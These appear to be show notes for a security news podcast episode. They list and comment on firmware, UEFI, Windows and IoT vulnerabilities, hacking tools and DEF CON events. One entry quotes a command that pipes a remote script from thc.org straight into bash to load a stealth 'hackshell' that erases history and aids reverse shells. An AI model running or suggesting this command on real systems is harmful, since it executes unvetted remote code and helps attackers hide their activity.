LPE FTW – PSW #839
This week: Option ROMS are a novel way to compromise a system at the lowest level, Sinkclose opens AMD processors up to attacks, at home in your firmware exploiting SMM complete with examples, Sonos speakers get hacked and enable attackers to listen in on your conversations, DEF CON badges use new chips and are not without controversy, lasers that can steal your passwords, it was a regex, Larry updates us on some IoT research, attackers have your SSN, and more updates from last week's hacker summer camp!
Announcements
We're always looking for great guests for all of the Security Weekly shows! Submit your suggestions by visiting https://securityweekly.com/guests and completing the form!
Hosts
- 1. CVE-2024-38063 (CVSS 9.8): 0-Click RCE Affects All Windows Systems
- 2. Linux Kernel Vulnerabilities Expose Systems to Privilege Escalation: Flaws Detailed and Exploit Code Released
- 3. [EN] Confusion Attacks: Exploiting Hidden Semantic Ambiguity in Apache HTTP Server!
- 4. Exploiting pfsense Remote Code Execution – CVE-2022-31814 – Laburity
- 5. A FreeBSD flaw could allow remote code execution, patch it now!
- 6. ‘Sinkclose’ Flaw in Hundreds of Millions of AMD Chips Allows Deep, Virtually Unfixable Infections
This is the crucial part: " In AMD-based machines, a safeguard known as TSeg prevents the computer's operating systems from writing to a protected part of memory meant to be reserved for System Management Mode known as System Management Random Access Memory or SMRAM. AMD's TClose feature, however, is designed to allow computers to remain compatible with older devices that use the same memory addresses as SMRAM, remapping other memory to those SMRAM addresses when it's enabled. Nissim and Okupski found that, with only the operating system's level of privileges, they could use that TClose remapping feature to trick the SMM code into fetching data they've tampered with, in a way that allows them to redirect the processor and cause it to execute their own code at the same highly privileged SMM level." - Also, the debate continues on whether this is a huge problem or not. People are dismissing these types of vulnerabilities for two reasons:
- Local Kernel-level privileges are required - There are so many ways to achieve this on Windows and Linux that I've lost count.
- Only nation-state attackers use exploits like this - There are so many exploits for UEFI that I've lost count. Why do we believe that only nation-state-level attackers will use them? Also, why do you not care about nation-state-level attacks? Oh, they won't go after you because you are not important enough? Every US-based company may face nation-state threat actors.
So, you know, just keep putting your head in the sand and pretend that we don't have to fix these vulnerabilities. That is, if you can even fix them, which is not even up to AMD, it's up to the OEM in many cases. I am waiting for Asus to push a UEFI update to fix this. I will just keep waiting...
- 7. OROM Backdoor Research
Presented at BH 2024 this was the most amazing research I've seen. And yes it has to do with UEFI, and specifically Option ROMS. This Github repo contains sample code! You can infect the supply chain too, placing backdoored OROMs on devices that are then shipped with PCs. You can also create one yourself, but you then have to install the hardware on a computer. Or you can go through the kernel and userland to infect the OROM. Awesome examples here, and this is super difficult to detect, don't expect your EDR to pick up on this. In fact, there are some interesting tid bits in this research that speak directly to bypassing EDR and other Windows protections.
- 8. SSD Advisory – Google Chrome RCE – SSD Secure Disclosure
- 9. Working Title: UnDisruptable27
- 10. Ghost in the PPL Part 1: BYOVDLL – SCRT Team Blog
- 11. Living off the land with Bluetooth PAN
- 12. GL-iNet Routers Exposed to Critical Vulnerabilities: Urgent Firmware Updates Required
- 13. Over 20,000 Ubiquiti Cameras and Routers are Vulnerable to Amplification Attacks and Privacy Risks – Check Point Blog
- 14. Introducing the RP2350 – Dmitry.GR
- 15. HPE Aruba Networking Addresses Severe Vulnerabilities in Access Points
- 16. Blog: A deep dive into CVE-2023-2163: How we found and fixed an eBPF Linux Kernel Vulnerability
- 17. From Exploits to Forensics: Unraveling the Unitronics Attack
- 18. “Zovek” , My Offensive IoT Redteam Implant v1.0
- 19. Phishing the anti-phishers: Exploiting anti-phishing tools for internal access – Ophion Security
- 20. wikiZ/RedGuard: RedGuard is a C2 front flow control tool,Can avoid Blue Teams,AVs,EDRs check.
- 21. Exploiting Lambda Functions for Fun and Profit
- 22. At Home In Your Firmware: Analysis of CVE-2024-36877
The article discusses a buffer overflow vulnerability in MSI firmware (CVE-2024-36877) within the System Management Mode (SMM) of UEFI. This vulnerability allows attackers to execute arbitrary code by exploiting an SMM handler, leading to potential firmware persistence and other severe security risks. There are so many incredible details here, including a full Github repo with all the examples. Definitely going to spend more time with this one!
- 23. Sonos smart speakers flaw allowed to eavesdrop on users
The researchers had to work pretty hard in certain circumstances to get around select protections on the platform. After reviewing the research paper, I will say the Sonos platform security was not horrible. However, the persistence of the researchers really shined as they were able to get around these protections. For example, they were able to dump the eMMC through hardware, only to find out the filesystem was encrypted. They used previous research and built upon it to achieve their goals, one of which was to gain remote access and enable the microphone to record audio. Amazing work!
- 24. GitHub – hacking-support/DVUEFI: Damn Vulnerable UEFI
I've not yet attempted to get this going, but if you are interested in UEFI security you should check this out. This project was done by two Eclypsium researchers and presented at Black Hat 2024 Arsenal talks. Using Qemu you can emulate and boot UEFI, then start hunting for vulnerabilities that were put there on purpose.
- 25. How Hackers Steal Your RFID Cards
Great tutorial on RFID hacking!
- 26. My keyboard was misbehaving so I had to exploit my NAS
I would have just ordered a new keyboard, but finding 0-day post-authentication RCEs is way more fun!
- 27. Raspberry Pi Pico 2, our new $5 microcontroller board, on sale now
I am excited about the RP2350, also used in the DEF CON badge, and not without more than its fair share of controversy.
- 28. CVE-2024-38077-POC/CVE-2024-38077.md at main · CloudCrowSec001/CVE-2024-38077-POC
Wow: "In this article, we demonstrate how a single vulnerability was exploited to bypass all mitigations and achieve a pre-authentication remote code execution (RCE) attack on Windows Server 2025, Which is considered the most secure Windows Server. It may seem fantastical in 2024, but it is a fact. Despite Microsoft's various fortifications to Windows for decades and we didn't see preauth 0-click RCE in Windows for years, we still can exploit a single memory corruption vulnerability to complete the entire attack. Looks like the system with "next-generation security improvements" fails to prevent the same old memory exploitation from 30 years ago this time."
- 29. Black Hat USA 2024: Chip Flaw ‘GhostWrite’ Steals Data from CPU Memory
Good news is that RISC-V stuff is still early in development, so hopefully they can get this fixed: "GhostWrite exploits a weakness in the processor’s memory management system, granting attackers unrestricted access to a device’s physical memory, bypassing critical security measures and potentially compromising sensitive data. Unlike previous attacks like Rowhammer, GhostWrite doesn’t require physical access to the chip." - It's basically a fancy LPE, and we all love some LPE.
- 1. Make BASH stealthy and hacker friendly with lots of bash functions
A new tool from THC was released this week, hackshell.
Make BASH stealthy and hacker friendly with lots of bash functions
Usage:
source <(curl -SsfL https://thc.org/hs)
Some features:
unsets HISTFILE, SSH_CONNECT, wget/redis/mysql/less-HISTORY, ... Upgrates to PTY shell (if reverse shell) Creates hacker-friendly shortcuts, bash-functions and aliases Static binary download by simple bin <command> (e.g. bin nmap) Does not write ANY data to the harddrive Leaves no trace *Bill added to the source code something for PAUL
- 1. Hackers may have stolen the Social Security numbers of every American. How to protect yourself
I'm not sure if this is a story or not, 'cause I've lost count of how many times my PII has been leaked. An all at once dump is significant, I suppose.
- 2. How Venezuela May Be Using Google Analytics to Track Political Dissidents
My friend, Chris Kubecka (@SecEvangelism) asked me to get people to spread this article around in hopes of protecting the journalist. #hacktivism
- 3. Most commonly reported cybercrime categories in the United States in 2023, by number of individuals affected
Now tell me that PCI hasn't made a difference...
- 4. DEF CON badge disagreement gets physical as firmware dev removed from event stage
I was out front of the LVCC when I saw a large gathering of hackers listening to someone speaking. I found out later it was this guy, Dmitry Grinberg. I heard murmurs about some developers getting credit in the badge that shouldn't, but here's the full story.
- 5. DEF CON 32: the unfixable bug that allows malware to be deployed via a browser
I interviewed Vivek Ramachandran, founder of SquareX last week and he alluded to some big news they were going to be dropping this past week. Here's a write-up of the announcement.
- 6. ‘Invasion of privacy’: Hotel room inspections confuse hacker convention attendees
In other big news...Las Vegas is getting serious about protecting visitors from the evils that lurk around DEF CON.
- 1. Watch How a Hacker’s Infrared Laser Can Spy on Your Laptop’s Keystrokes
- 2. PKfail: Untrusted Platform Keys Undermine Secure Boot on UEFI Ecosystem
- 3. The bizarre secrets I found investigating corrupt Winamp skins
- 4. Back to the future: Windows Update is now a trojan horse for hackers
- 5. IT WAS A REGEX?!? – Full CrowdStrike Report Released
- 6. New Report from Finite State and Forescout: Uncovering the Hidden Vulnerabilities in OT/IoT Routers
- 7. The nation’s best hackers found vulnerabilities in voting machines — but no time to fix them
- 8. Data Breach Exposes 3 Billion Personal Information Records